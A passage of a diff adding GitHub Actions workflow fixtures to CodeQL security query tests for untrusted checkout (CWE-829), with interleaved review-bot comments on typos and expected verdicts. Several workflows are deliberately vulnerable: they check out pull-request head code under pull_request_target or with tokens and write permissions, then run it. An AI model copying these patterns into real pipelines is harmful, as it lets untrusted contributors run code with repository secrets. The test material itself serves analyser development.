actions/jekyll-build-pages@b178f9334b208360999a0a57b523613563698c66 # v1 + with: + source: ./ + destination: ./_site + - name: Upload artifact + # Automatically uploads an artifact from the './_site' directory by default + uses: actions/upload-pages-artifact@56afc609e74202658d3ffba0e8f6dda462b719fa # v3 + # Deployment job + deploy: + environment: + name: 'Pages Preview' + url: ${{ steps.deployment.outputs.page_url }} + # Sets permissions of the GITHUB_TOKEN to allow deployment to 
GitHub Pages + permissions: + contents: read + pages: write + id-token: write + runs-on: ubuntu-latest + needs: build + steps: + - name: Deploy to GitHub Pages + id: deployment + uses: actions/deploy-pages@d6db90164ac5ed86f2b6aed7e0febac5b3c0c03e # v4 + with: + preview: 'true' diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc2.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc2.yml new file mode 100644 index 000000000000..5501beb9ea2f --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc2.yml 
@@ -0,0 +1,58 @@ +name: branch-deploy + +on: + issue_comment: + types: [created] + +# Permissions needed for reacting and adding comments for IssueOps commands +permissions: + pull-requests: write + deployments: write + contents: write + checks: read + +jobs: + branch-deploy: + name: branch-deploy + if: # only run on pull request comments and very specific comment body string as defined in our branch-deploy settings + ${{ github.event.issue.pull_request && + (startsWith(github.event.comment.body, '.deploy') || + startsWith(github.event.comment.body, '.noop') || + startsWith(github.event.comment.body, '.lock') || + startsWith(github.event.comment.body, '.help') || + startsWith(github.event.comment.body, '.wcid') || + startsWith(github.event.comment.body, '.unlock')) }} + runs-on: ubuntu-latest + + steps: + - name: branch-deploy + id: branch-deploy + uses: github/branch-deploy@v9 + with: + trigger: ".deploy" + environment: "production" + sticky_locks: "true" # https://github.com/github/branch-deploy/blob/1f6516ef5092890ce75d9e97ca7cbdb628e38bdd/docs/hubot-style-deployment-locks.md + + # Check out the ref from the output of the IssueOps command + - uses: actions/checkout@v4 + if: ${{ steps.branch-deploy.outputs.continue == 'true' }} + with: + ref: ${{ steps.branch-deploy.outputs.ref }} + + - uses: ruby/setup-ruby@d4526a55538b775af234ba4af27118ed6f8f6677 # pin@v1.172.0 + if: ${{ steps.branch-deploy.outputs.continue == 'true' }} + with: + bundler-cache: true + + - name: bootstrap + if: ${{ steps.branch-deploy.outputs.continue == 'true' }} + run: script/bootstrap + + # Here we run a deploy. 
It is "gated" by the IssueOps logic and will only run if the outputs from our branch-deploy step indicate that the workflow should continue + - name: deploy + if: ${{ steps.branch-deploy.outputs.continue == 'true' && steps.branch-deploy.outputs.noop != 'true' }} + run: | + set -o pipefail + script/deploy | tee deploy.out + bundle exec ruby script/ci/render_deploy_message.rb + rm deploy.out diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc3.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc3.yml new file mode 100644 index 000000000000..4d5ae1f528cd --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc3.yml 
@@ -0,0 +1,64 @@ +name: Publish + +on: + push: + branches: + - main + pull_request_target: + workflow_dispatch: + workflow_call: + +jobs: + build-and-upload: + runs-on: ubuntu-latest + permissions: + contents: read + steps: + + - name: Checkout PR + if: ${{ github.event_name == 'pull_request_target' }} + uses: actions/checkout@v3 + with: + ref: ${{ github.event.pull_request.head.ref }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + + - name: Checkout + if: ${{ github.event_name != 'pull_request_target' }} + uses: actions/checkout@v3 + with: + ref: main + + - name: Setup Pages + uses: actions/configure-pages@v1 + - name: Use Node.js + uses: actions/setup-node@v3 + with: + node-version: 18 + cache: npm + - name: Update npm to latest + run: npm i --prefer-online --no-fund --no-audit -g npm@latest + - run: npm -v + - run: npm i --ignore-scripts --no-audit --no-fund --package-lock + - run: npm run build -w www + - name: Upload artifact + uses: actions/upload-pages-artifact@v1 + with: + path: './workspaces/www/build' + + deploy: + runs-on: ubuntu-latest + needs: build-and-upload + environment: + name: github-pages + url: ${{ steps.deployment.outputs.page_url }} + permissions: + pages: write + id-token: write + outputs: + deployment_url: ${{ steps.deployment.outputs.page_url }} + steps: + - name: Deploy to GitHub Pages + id: deployment + uses: actions/deploy-pages@v1 + with: + preview: ${{ github.event_name == 'pull_request_target' }} diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/pr-workflow-fork.yaml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/pr-workflow-fork.yaml new file mode 100644 index 000000000000..98c25f832316 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/pr-workflow-fork.yaml 
@@ -0,0 +1,27 @@ +name: "pr-workflow-fork" +concurrency: + group: ${{ github.workflow }}-pr-workflow-fork-${{ github.event.pull_request.number || github.ref }} + cancel-in-progress: true + +on: + pull_request_target: + +jobs: + pr-workflow-fork: + uses: ./.github/workflows/pr-workflow.yml + with: + github_event_name: ${{ github.event_name }} + github_event_pull_request_head_repo_id : ${{ github.event.pull_request.head.repo.id }} + github_workflow: $ {{ github.workflow }} + github_event_pull_request_head_sha: ${{ github.event.pull_request.head.sha }} + flow: ${{( github.event_name == 'push' && 'push' ) || ( github.event_name == 'merge_group' && 'merge_queue_check' ) || ( github.event_name == 'pull_request_target' && github.event.pull_request.head.repo.id != 383289760 && 'pr_from_fork' ) || ( github.event_name == 'pull_request' && github.event.pull_request.head.repo.id == 383289760 && 'pr_from_branch' )}} + sha_to_check: ${{ github.event.pull_request.head.sha || github.sha }} + + secrets: + CACHIX_AUTH_TOKEN: ${{ secrets.CACHIX_AUTH_TOKEN }} + DOCKER_HUB_USERNAME: ${{ secrets.DOCKER_HUB_USERNAME }} + DOCKER_HUB_ACCESS_TOKEN: ${{ secrets.DOCKER_HUB_ACCESS_TOKEN }} + PABLO_PROJ_JSON: ${{ secrets.PABLO_PROJ_JSON }} + VERCEL_TOKEN: ${{ secrets.VERCEL_TOKEN }} + CANCEL_GITHUB_TOKEN: ${{ github.token }} + NIXBUILD_TOKEN: ${{ secrets.NIXBUILD_TOKEN }} diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/pr-workflow.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/pr-workflow.yml new file mode 100644 index 000000000000..061ff7d02c5e --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/pr-workflow.yml 
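Review bot: `github_workflow: $ {{ github.workflow }}` contains a space between `$` and `{{`, so it is not evaluated as an expression and the literal text `$ {{ github.workflow }}` is what the reusable workflow receives; pr-workflow.yml (next hunk) interpolates that input into its `concurrency.group` values, which this typo turns into a constant string. If the fixture was copied verbatim from an upstream repository for realism, a comment saying so would stop a future reviewer from "fixing" it; if it is meant to exercise flow of caller inputs into the called workflow, the line should be `github_workflow: ${{ github.workflow }}`. The `flow:` expression on the next line does use proper `${{ }}` syntax, which suggests the space is unintentional.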
@@ -0,0 +1,463 @@ +name: "pr-workflow" +concurrency: + group: ${{ github.workflow }}-pr-workflow-${{ github.event.pull_request.number || github.ref }} + cancel-in-progress: true +on: + workflow_call: + inputs: + github_event_name: + required: true + type: string + github_event_pull_request_head_repo_id: + required: true + type: number + github_workflow: + required: true + type: string + github_event_pull_request_head_sha: + required: true + type: string + flow: + required: true + type: string + sha_to_check: + required: true + type: string + secrets: + NIXBUILD_TOKEN: + required: true + CACHIX_AUTH_TOKEN: + required: true + DOCKER_HUB_USERNAME: + required: true + DOCKER_HUB_ACCESS_TOKEN: + required: true + PABLO_PROJ_JSON: + required: true + VERCEL_TOKEN: + required: true + CANCEL_GITHUB_TOKEN: + required: true + +permissions: + pull-requests: write + +jobs: + dependency-review: + outputs: + ok: ${{ steps.ok.outputs.ok }} + concurrency: + group: ${{ inputs.github_workflow }}-dependency-review-${{ github.event.pull_request.number || github.ref }} + cancel-in-progress: true + needs: + - privilege-check + runs-on: + - ubuntu-latest + steps: + - name: checkout + uses: actions/checkout@v3 + if: ${{ inputs.github_event_name != 'merge_group' && inputs.github_event_name != 'push' }} + - uses: amannn/action-semantic-pull-request@v5 + if: ${{ inputs.github_event_name != 'merge_group' && inputs.github_event_name != 'push' }} + with: + requireScope: false + subjectPattern: (.*[a-zA-Z].*){16,} + subjectPatternError: | + https://regexper.com/#%28.*%5Ba-zA-Z%5D.*%29%7B16%2C%7D + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + + - name: dependency-review + if: ${{ inputs.github_event_name != 'merge_group' && inputs.github_event_name != 'push' }} + uses: actions/dependency-review-action@v3 + with: + # GHSA-pfrx-2q88-qq97, GHSA-w5p7-h5w8-2hfq, GHSA-wcg3-cvx6-7396 are ignored because they are casued by the static Docusaurus build. Please remove when Docusaurus gets updated. 
+ # GHSA-969w-q74q-9j8v, GHSA-44mr-8vmm-wjhg, GHSA-wh6w-3828-g9qf are ignored because they are transitive dependencies still used by the master branch of Substrate. Please remove when Substrate update the according dependencies. + # GHSA-fjx5-qpf4-xjf2 is ignored because it is a transitive dependencies still used by the master branch of ibc-proto-rs. Please remove when ibc-rs-proto updates it. + allow-ghsas: GHSA-pfrx-2q88-qq97, GHSA-w5p7-h5w8-2hfq, GHSA-wcg3-cvx6-7396, GHSA-969w-q74q-9j8v, GHSA-44mr-8vmm-wjhg, GHSA-wh6w-3828-g9qf, GHSA-ff4p-7xrq-q5r8, GHSA-xm67-587q-r2vw, GHSA-fjx5-qpf4-xjf2 + - id: ok + run: echo "ok=true" >> "$GITHUB_OUTPUT" + + privilege-check: + name: "privilege-check" + if: ${{ inputs.flow == 'push' || inputs.github_event_name == 'merge_group' || (inputs.github_event_name == 'pull_request_target' && inputs.github_event_pull_request_head_repo_id != 383289760) || (inputs.github_event_name == 'pull_request' && inputs.github_event_pull_request_head_repo_id == 383289760) }} + continue-on-error: false + runs-on: ubuntu-latest + steps: + - run: | + echo "${{ inputs.github_event_name }}"" + echo "${{ inputs.flow }}"" + echo "${{ github.ref_name }}" + echo "${{ inputs.github_event_pull_request_head_repo_id }}" + + lfs-check: + name: lfs-check + needs: + - privilege-check + continue-on-error: false + runs-on: ubuntu-latest + concurrency: + group: ${{ inputs.github_workflow }}-lfs-check-${{ github.event.pull_request.number || github.ref }} + cancel-in-progress: true + steps: + - uses: actions/checkout@v3 + with: + ref: ${{ inputs.github_event_pull_request_head_sha || github.sha }} + persist-credentials: false + submodules: false + lfs: true + - uses: actionsdesk/lfs-warning@v3.2 + name: lfs-warning + with: + labelName: lfs-detected! 
+ filesizelimit: 20KB + exclusionPatterns: | + **/*.rs + **/*.ts + **/*.md + **/*.json + **/*.lock + **/*.nix + **/*.sol + **/*.toml + flake/eth-pos-devnet + - run: echo ${{ steps.lfs-warning.outputs.lfsFiles }} + + nix-flake-check: + name: "nix-flake-check" + outputs: + ok: ${{ steps.ok.outputs.ok }} + needs: + - privilege-check + runs-on: + - ubuntu-latest-m + continue-on-error: false + concurrency: + group: ${{ inputs.github_workflow }}-nix-flake-check-${{ github.event.pull_request.number || github.ref }} + cancel-in-progress: true + steps: + - uses: actions/checkout@v3 + with: + lfs: true + ref: ${{ inputs.github_event_pull_request_head_sha || github.sha }} + persist-credentials: false + - uses: cachix/install-nix-action@v20 + with: + nix_path: nixpkgs=channel:nixos-unstable + - uses: DeterminateSystems/magic-nix-cache-action@main + - uses: cachix/cachix-action@master + with: + authToken: "${{ secrets.CACHIX_AUTH_TOKEN }}" + name: composable + skipAddingSubstituter: false + skipPush: false + - run: | + nix --version + nix show-config + nix run .#nix-flake-check --accept-flake-config + - id: ok + run: echo "ok=true" >> "$GITHUB_OUTPUT" + + + # build-all-outputs-packages-arm: + # outputs: + # ok: ${{ steps.ok.outputs.ok }} + # name: build-all-outputs-packages-arm + # needs: + # - privilege-check + # runs-on: + # - aarch64-linux-80C-128GB-2048GB + # concurrency: + # group: ${{ inputs.github_workflow }}-build-all-outputs-packages-arm-${{ github.event.pull_request.number || github.ref }} + # cancel-in-progress: true + # steps: + # - name: Set up Cachix + # if: ${{ inputs.flow == 'push' }} + # uses: cachix/cachix-action@586bf280495080c5a6d4868237ad28a860e4b309 + # with: + # authToken: "${{ secrets.CACHIX_AUTH_TOKEN }}" + # name: composable + # installCommand: "true" + # - uses: actions/checkout@v3 + # if: ${{ inputs.flow == 'push' }} + # with: + # lfs: true + # ref: ${{ inputs.github_event_pull_request_head_sha || github.sha }} + # persist-credentials: false + # - 
name: Build all packages + # if: ${{ inputs.flow == 'push' }} + # uses: "./.github/templates/watch-exec" + # with: + # command: nix -- build .#all-outputs + # - id: ok + # run: echo "ok=true" >> "$GITHUB_OUTPUT" + + + build-all-outputs-packages: + outputs: + ok: ${{ steps.ok.outputs.ok }} + name: build-all-outputs-packages + needs: + - privilege-check + - build-all-deps-packages + runs-on: + - x86_64-linux-32C-128GB-2TB + concurrency: + group: ${{ inputs.github_workflow }}-build-all-outputs-packages-${{ github.event.pull_request.number || github.ref }} + cancel-in-progress: true + steps: + - name: Set up Cachix + if: ${{ inputs.flow == 'push' || inputs.flow == 'pr_from_branch' }} + uses: cachix/cachix-action@586bf280495080c5a6d4868237ad28a860e4b309 + with: + authToken: "${{ secrets.CACHIX_AUTH_TOKEN }}" + name: composable + installCommand: "true" + - uses: actions/checkout@v3 + if: ${{ inputs.flow == 'push' || inputs.flow == 'pr_from_branch' }} + with: + lfs: true + ref: ${{ inputs.github_event_pull_request_head_sha }} + persist-credentials: false + - name: Build all packages + if: ${{ inputs.flow == 'push' || inputs.flow == 'pr_from_branch' }} + uses: "./.github/templates/watch-exec" + with: + command: nix -- build .#all-outputs + - id: ok + run: echo "ok=true" >> "$GITHUB_OUTPUT" + + build-all-checks-packages: + outputs: + ok: ${{ steps.ok.outputs.ok }} + name: build-all-checks-packages + needs: + - privilege-check + - build-all-outputs-packages + runs-on: + - x86_64-linux-32C-128GB-2TB + concurrency: + group: ${{ inputs.github_workflow }}-build-all-checks-packages-${{ github.event.pull_request.number || github.ref }} + cancel-in-progress: true + steps: + - name: Set up Cachix + if: ${{ inputs.flow == 'push' || inputs.flow == 'pr_from_branch' }} + uses: cachix/cachix-action@586bf280495080c5a6d4868237ad28a860e4b309 + with: + authToken: "${{ secrets.CACHIX_AUTH_TOKEN }}" + name: composable + installCommand: "true" + - uses: actions/checkout@v3 + if: ${{ inputs.flow 
== 'push' || inputs.flow == 'pr_from_branch' }} + with: + lfs: true + ref: ${{ inputs.github_event_pull_request_head_sha || github.sha }} + persist-credentials: false + - name: Build all packages + if: ${{ inputs.flow == 'push' || inputs.flow == 'pr_from_branch' }} + uses: "./.github/templates/watch-exec" + with: + command: nix -- build .#all-checks + - id: ok + run: echo "ok=true" >> "$GITHUB_OUTPUT" + + + build-all-deps-packages: + name: build-all-deps-packages + outputs: + ok: ${{ steps.ok.outputs.ok }} + needs: + - privilege-check + runs-on: + - x86_64-linux-32C-128GB-2TB + concurrency: + group: ${{ inputs.github_workflow }}-build-all-deps-packages-${{ matrix.runner }}-${{ github.event.pull_request.number || github.ref }} + cancel-in-progress: true + steps: + - name: Set up Cachix + if: ${{ inputs.flow == 'push' || inputs.flow == 'pr_from_branch' || inputs.flow == 'pr_from_fork' }} + uses: cachix/cachix-action@586bf280495080c5a6d4868237ad28a860e4b309 + with: + authToken: "${{ secrets.CACHIX_AUTH_TOKEN }}" + name: composable + installCommand: "true" + - uses: actions/checkout@v3 + if: ${{ inputs.flow == 'push' || inputs.flow == 'pr_from_branch' || inputs.flow == 'pr_from_fork' }} + with: + lfs: true + ref: ${{ inputs.github_event_pull_request_head_sha || github.sha }} + persist-credentials: false + - name: build-all-deps-packages + if: ${{ inputs.flow == 'push' || inputs.flow == 'pr_from_branch' || inputs.flow == 'pr_from_fork' }} + uses: "./.github/templates/watch-exec" + with: + command: nix -- build .#all-deps + - id: ok + run: echo "ok=true" >> "$GITHUB_OUTPUT" + + draft-release-check: + name: "draft-release-check" + if: ${{ failure() || cancelled() || success() }} + continue-on-error: false + runs-on: ubuntu-latest + needs: + - build-all-checks-packages + - dependency-review + - nix-flake-check + - mantis-e2e + steps: + - run: | + echo "nix-flake-check" ${{ needs.nix-flake-check.outputs.ok }} + echo "dependency-review" ${{ needs.dependency-review.outputs.ok 
}} + echo "build-all-checks-packages" ${{ needs.build-all-checks-packages.outputs.ok }} + echo "mantis-e2e" ${{ needs.mantis-e2e.outputs.ok }} + - if: ${{ needs.nix-flake-check.outputs.ok == 'true' && needs.dependency-review.outputs.ok == 'true' && needs.build-all-checks-packages.outputs.ok == 'true' && needs.mantis-e2e.outputs.ok == 'true' }} + run: | + echo "All dependencies built well" + exit 0 + - if: ${{ !(needs.nix-flake-check.outputs.ok == 'true' && needs.dependency-review.outputs.ok == 'true' && needs.build-all-checks-packages.outputs.ok == 'true' && needs.mantis-e2e.outputs.ok == 'true' ) }} + run: | + echo "Some of dependencies (see jobs graph, needs attributes, and output of this job) failed" + exit 42 + + draft-release-artifacts: + name: "draft-release-artifacts" + runs-on: + - x86_64-linux-32C-128GB-2TB + needs: + - draft-release-check + if: ${{ inputs.github_event_name == 'push' }} + permissions: + pull-requests: write + contents: write + concurrency: + group: ${{ inputs.github_workflow }}-draft-release-artifacts-${{ github.ref }} + cancel-in-progress: true + steps: + - name: Set up Cachix + uses: cachix/cachix-action@586bf280495080c5a6d4868237ad28a860e4b309 + with: + authToken: "${{ secrets.CACHIX_AUTH_TOKEN }}" + name: composable + installCommand: "true" + - uses: actions/checkout@v3 + with: + fetch-depth: 0 + - name: Login to DockerHub + uses: docker/login-action@v2 + with: + username: ${{ secrets.DOCKER_HUB_USERNAME }} + password: ${{ secrets.DOCKER_HUB_ACCESS_TOKEN }} + - name: Download artifacts + run: | + nix run .#generate-release-artifacts --print-build-logs + + - name: Release artifacts + uses: softprops/action-gh-release@v1 + with: + draft: true + prerelease: false + fail_on_unmatched_files: true + generate_release_notes: true + body_path: release-artifacts/release.txt + name: ${{ github.ref_name }} + tag_name: ${{ github.ref_name }} + target_commitish: ${{ github.sha }} + files: | + release-artifacts/to-upload/* + + push-docker-images: + 
name: push-docker-images + if: ${{ inputs.flow == 'push' }} + needs: + - draft-release-check + runs-on: + - x86_64-linux-32C-128GB-2TB + concurrency: + group: ${{inputs.flow}}-${{ inputs.github_workflow }}-push-docker-images-${{ github.event.pull_request.number || github.ref }} + cancel-in-progress: false + steps: + - name: Set up Cachix + uses: cachix/cachix-action@586bf280495080c5a6d4868237ad28a860e4b309 + with: + authToken: "${{ secrets.CACHIX_AUTH_TOKEN }}" + name: composable + installCommand: "true" + - uses: actions/checkout@v3 + with: + lfs: true + ref: ${{ inputs.github_event_pull_request_head_sha || github.sha }} + persist-credentials: false + - name: Build all packages + uses: "./.github/templates/watch-exec" + with: + command: nix -- build .#all + - name: Publish cmc-api to docker hub + uses: "./.github/templates/docker-publish" + with: + image_path: result/docker-image-cmc-api.tar.gz + username: ${{ secrets.DOCKER_HUB_USERNAME }} + password: ${{ secrets.DOCKER_HUB_ACCESS_TOKEN }} + name: cmc-api + artifact: cmc-api:latest + + - name: Publish devnet-xc to docker hub + uses: "./.github/templates/docker-publish" + with: + image_path: result/docker-image-devnet-xc.tar.gz + username: ${{ secrets.DOCKER_HUB_USERNAME }} + password: ${{ secrets.DOCKER_HUB_ACCESS_TOKEN }} + name: devnet-xc + artifact: devnet-xc:latest + tag: ${{ inputs.github_event_name == 'push' && 'main' || ''}} + + - name: Publish hyperspace-composable-rococo-picasso-rococo to docker hub + uses: "./.github/templates/docker-publish" + with: + image_path: result/hyperspace-composable-rococo-picasso-rococo.tar.gz + username: ${{ secrets.DOCKER_HUB_USERNAME }} + password: ${{ secrets.DOCKER_HUB_ACCESS_TOKEN }} + name: hyperspace-composable-rococo-picasso-rococo + artifact: hyperspace-composable-rococo-picasso-rococo:latest + + - name: Publish hyperspace-composable-polkadot-picasso-kusama to docker hub + uses: "./.github/templates/docker-publish" + with: + image_path: 
result/hyperspace-composable-polkadot-picasso-kusama.tar.gz
+ username: ${{ secrets.DOCKER_HUB_USERNAME }}
+ password: ${{ secrets.DOCKER_HUB_ACCESS_TOKEN }}
+ name: hyperspace-composable-polkadot-picasso-kusama
+ artifact: hyperspace-composable-polkadot-picasso-kusama:latest
+
+ mantis-e2e:
+ name: mantis-e2e
+ outputs:
+ ok: ${{ steps.ok.outputs.ok }}
+ needs:
+ - build-all-checks-packages
+ runs-on:
+ - ubuntu-latest-m
+ concurrency:
+ group: ${{ inputs.github_workflow }}-mantis-e2e-${{ github.event.pull_request.number || github.ref }}
+ cancel-in-progress: true
+ steps:
+ - uses: actions/checkout@v3
+ with:
+ lfs: true
+ ref: ${{ inputs.github_event_pull_request_head_sha || github.sha }}
+ persist-credentials: false
+ - uses: cachix/install-nix-action@v20
+ with:
+ nix_path: nixpkgs=channel:nixos-unstable
+ - uses: DeterminateSystems/magic-nix-cache-action@main
+ - uses: cachix/cachix-action@master
+ with:
+ authToken: "${{ secrets.CACHIX_AUTH_TOKEN }}"
+ name: composable
+ skipAddingSubstituter: false
+ skipPush: false
+ - name: Devnet integration tests
+ run: |
+ nix run .#mantis-e2e --accept-flake-config --impure
+ - id: ok
+ run: echo "ok=true" >> "$GITHUB_OUTPUT"
diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/priv_pull_request_checkout.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/priv_pull_request_checkout.yml
new file mode 100644
index 000000000000..d8381176fd23
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/priv_pull_request_checkout.yml
@@ -0,0 +1,23 @@
+name: Test
+
+on:
+ pull_request:
+
+permissions:
+ contents: write
+ pull-requests: write
+
+jobs:
+ test:
+ runs-on: ubuntu-latest
+ steps:
+ - name: Check out repo on head ref
+ uses: actions/checkout@93ea575cb5d8a053eaa0ac8fa3b40d7e05a33cc8
+ with:
+ ref: ${{ github.head_ref }}
+ token: ${{ secrets.DOCUBOT_REPO_PAT }}
+
+ - run: |
+ ./cmd
+ env:
+ GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
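Review bot: In the `privilege-check` job the first two `echo` lines end with a doubled quote (`echo "${{ inputs.github_event_name }}""` and `echo "${{ inputs.flow }}""`), which leaves an unterminated string in bash, so as a runnable sample the gate job that every other job `needs` would fail at parse time. If the fixture is meant to be valid YAML/bash rather than an exact copy, drop the extra quote on both lines: `echo "${{ inputs.github_event_name }}"` and `echo "${{ inputs.flow }}"`; if it is a verbatim sample, a comment saying so avoids confusion. `build-all-deps-packages` also interpolates `${{ matrix.runner }}` into its `concurrency.group` with no `matrix` defined, which evaluates to an empty string. This hunk begins at the `@@ -0,0 +1,463 @@` header on an earlier line of the page.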
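Review bot: The checkout step passes `token: ${{ secrets.DOCUBOT_REPO_PAT }}` without `persist-credentials: false`, so actions/checkout stores that PAT in the checked-out repository's git config where the following `./cmd` step can read it; whether the fixture expects this step to be reported is not stated. Because the trigger is `pull_request` (not `_target`), secrets and the `contents: write` permission only apply to same-repository PRs, so the intended verdict (positive or negative case) is worth a comment on the step, e.g. `# fixture: pull_request checkout of head_ref with a PAT; expected verdict: <placeholder>`.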
diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/resolve-args.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/resolve-args.yml
new file mode 100644
index 000000000000..72db8c29370d
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/resolve-args.yml
@@ -0,0 +1,36 @@
+on:
+ workflow_call:
+ inputs:
+ comment:
+ type: string
+ required: true
+ outputs:
+ SHOULD_RUN:
+ value: ${{ jobs.resolve.outputs.SHOULD_RUN }}
+ GIT_REF:
+ value: ${{ jobs.resolve.outputs.GIT_REF }}
+jobs:
+ resolve:
+ runs-on: ubuntu-latest
+ outputs:
+ SHOULD_RUN: ${{ steps.resolve-step.outputs.SHOULD_RUN }}
+ GIT_REF: ${{ steps.resolve-step.outputs.GIT_REF }}
+ steps:
+ - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2
+ - if: github.event_name == 'workflow_run'
+ uses: ./.github/actions/download-artifact
+ - id: resolve-step
+ env:
+ ALLOWED_COMMENT: ${{ inputs.comment }}
+ run: |
+ if [[ "${{ github.event_name }}" == "workflow_run" ]]; then
+ if [[ "$(head -n 1 /tmp/artifacts/metadata.txt)" == *"$ALLOWED_COMMENT"* ]]; then
+ echo SHOULD_RUN=true >> "$GITHUB_OUTPUT"
+ else
+ echo SHOULD_RUN=false >> "$GITHUB_OUTPUT"
+ fi
+ echo GIT_REF="$(tail -n 1 /tmp/artifacts/metadata.txt)" >> "$GITHUB_OUTPUT"
+ else
+ echo SHOULD_RUN=true >> "$GITHUB_OUTPUT"
+ echo GIT_REF="" >> "$GITHUB_OUTPUT"
+ fi
diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller1.yaml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller1.yaml
new file mode 100644
index 000000000000..e53e55aff4ce
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller1.yaml
@@ -0,0 +1,11 @@
+name: assets-test
+
+on:
+ pull_request_target:
+
+jobs:
+ check-execution-context:
+ uses: TestOrg/TestRepo/.github/workflows/reusable.yml@main
+ with:
+ branch: ${{ github.event.pull_request.head.ref }}
+
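Review bot: Both `SHOULD_RUN` and `GIT_REF` in `resolve-step` are derived from `/tmp/artifacts/metadata.txt`, which is produced by the local `./.github/actions/download-artifact` action, and that action is not part of this fixture set as far as visible; if the query has to resolve local actions to classify the file as artifact-derived, the test should either vendor a minimal `action.yml` for it or state in a comment that resolution is expected to fail. The `echo GIT_REF="$(tail -n 1 /tmp/artifacts/metadata.txt)" >> "$GITHUB_OUTPUT"` line writes the artifact's last line into a workflow output without any validation, which I take to be the intended sink; a marker such as `# expected: artifact-derived ref flows to caller output` on that line would make the expectation explicit. The `if [[ "${{ github.event_name }}" == ... ]]` interpolation is safe here since `github.event_name` is not user-controlled, but using `$GITHUB_EVENT_NAME` would keep the sample free of inline expressions in shell.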
diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller2.yaml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller2.yaml
new file mode 100644
index 000000000000..50c0dd4901cd
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller2.yaml
@@ -0,0 +1,11 @@
+name: assets-test
+
+on:
+ pull_request:
+
+jobs:
+ check-execution-context:
+ uses: TestOrg/TestRepo/.github/workflows/reusable.yml@main
+ with:
+ branch: ${{ github.event.pull_request.head.ref }}
+
diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller3.yaml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller3.yaml
new file mode 100644
index 000000000000..560475dc9384
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller3.yaml
@@ -0,0 +1,11 @@
+name: assets-test
+
+on:
+ pull_request_target:
+
+jobs:
+ check-execution-context:
+ uses: ./.github/workflows/reusable_local.yml
+ with:
+ branch: ${{ github.event.pull_request.head.ref }}
+
diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_local.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_local.yml
new file mode 100644
index 000000000000..3b8a6d6dd62a
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_local.yml
@@ -0,0 +1,29 @@
+name: Test
+
+on:
+ workflow_call:
+ inputs:
+ branch:
+ type: string
+ default: "**"
+
+defaults:
+ run:
+ shell: bash
+
+jobs:
+ test:
+ name: Checkout
+ runs-on: ubuntu-latest
+
+ permissions:
+ contents: write
+ pull-requests: write
+ steps:
+ - uses: actions/checkout@v2
+ with:
+ ref: ${{ inputs.branch }}
+ - run: |
+ npm install
+ npm run lint
+
diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test.yml
new file mode 100644
index 000000000000..96fd8bdd1a4b
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test.yml
@@ -0,0 +1,37 @@
+name: Tests
+on:
+ push:
+ branches:
+ - master
+ pull_request:
+ workflow_dispatch:
+
+jobs:
+ tests:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v3
+ - name: Fetch CodeQL
+ shell: bash
+ env:
+ GITHUB_TOKEN: ${{ github.token }}
+ run: |
+ gh extension install github/gh-codeql
+ gh codeql set-channel "nightly"
+ gh codeql version
+ printf "CODEQL_FETCHED_CODEQL_PATH=" >> "${GITHUB_ENV}"
+ gh codeql version --format=json | jq -r .unpackedLocation >> "${GITHUB_ENV}"
+ gh codeql version --format=json | jq -r .unpackedLocation >> "${GITHUB_PATH}"
+ - name: Install Packs
+ env:
+ GITHUB_TOKEN: ${{ github.token }}
+ run: |
+ gh repo clone github/codeql
+ codeql pack install "ql/lib"
+ codeql pack install "ql/src"
+ codeql pack install "ql/test"
+ - name: Run Tests
+ env:
+ GITHUB_TOKEN: ${{ github.token }}
+ run: |
+ codeql test run ql/test
diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test1.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test1.yml
new file mode 100644
index 000000000000..3cab86f3171b
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test1.yml
@@ -0,0 +1,27 @@
+name: Pull Request Open
+
+on:
+ pull_request_target:
+ branches:
+ - main
+ - 14.0.x
+
+ types:
